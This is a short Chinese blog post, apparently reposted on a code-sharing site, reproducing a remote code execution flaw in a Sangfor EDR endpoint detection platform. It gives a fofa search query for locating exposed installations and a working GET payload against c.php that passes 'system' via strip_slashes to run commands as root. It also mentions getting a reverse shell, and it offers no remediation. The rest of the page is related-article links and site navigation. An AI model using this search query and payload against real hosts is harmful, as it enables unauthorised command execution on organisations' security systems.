某信服EDR终端检测响应平台RCE漏洞 - 代码天地

某信服EDR终端检测响应平台RCE漏洞

其他 2020-09-09 04:23:02 阅读次数: 0

前言：

这个平台是干嘛的，这里就不废话了，刚好赶上了护网期间爆出来的，回头就被告知护网结束，这里简单复现一下。

复现：

第一步：通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。
在这里插入图片描述

第二步：随缘点击进去一个来到主界面，也就是这个样子。
在这里插入图片描述

第三步：构造payload，这里漏洞文件是c.php，漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id

直接root权限
在这里插入图片描述
反弹shell。

猜你喜欢

转载自blog.csdn.net/cj_Allen/article/details/108070714

某信服EDR终端检测响应平台RCE漏洞

深信服 EDR终端检测响应平台RCE漏洞代码分析

深信服 EDR终端检测响应平台 0day RCE 漏洞

深信服 EDR终端检测响应平台免登陆后台漏洞代码分析

深信服 EDR 终端检测响应平台 -2020HW

漏洞复现-某智能终端操作平台前台通用SQL注入漏洞（附漏洞检测脚本）

某软件监控页面RCE漏洞分析

某ERP系统存在RCE漏洞

【漏洞日记】某X服又出高危漏洞， EDR 任意用户登录漏洞

【漏洞日记】深信服EDR 吾还没见过，就听说被人日穿了

MAC卸载深信服edr

Pikachu漏洞练习平台实验——RCE（五）

【漏洞复现】Yapi接口管理平台RCE漏洞汇总

RCE漏洞

EDR（端点、端点检测与响应中心、可视化展现）

CVE-2019-15107 Webmin RCE漏洞检测工具

某钉RCE & 某葵RCE 复现

powershell杀软,EDR检测

【漏洞复现】联软科技安全准入门户平台RCE(命令执行)漏洞

深信服EDR产品线实施遇到的问题

pikachu之RCE漏洞

钉钉 RCE 漏洞

EDR

Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC

渗透工具xiangrikui-exp:向日葵 RCE 漏洞一键批量检测

大华智慧园区综合管理平台RCE漏洞复现(0day)

漏洞复现-iDocview某接口存在任意文件读取漏洞（附漏洞检测脚本）

漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞（附漏洞检测脚本）

GitStack系统RCE漏洞学习

fastjson的RCE漏洞复现记录

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

Java基础复习_day13_Collection集合

2018.11.16 c语言学习经验

且看Java内置四大核心函数式接口

小程序云开发中数据库的数据分段和显示图片

python的函数

Web-JS进阶

【干货】C++常用代码积累笔记大全

Spring的ioc操作与 IOC底层原理

构建之法20191121-11 Scrum立会报告+燃尽图 07

Spring boot之Hello World访问404

每日归档

更多

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)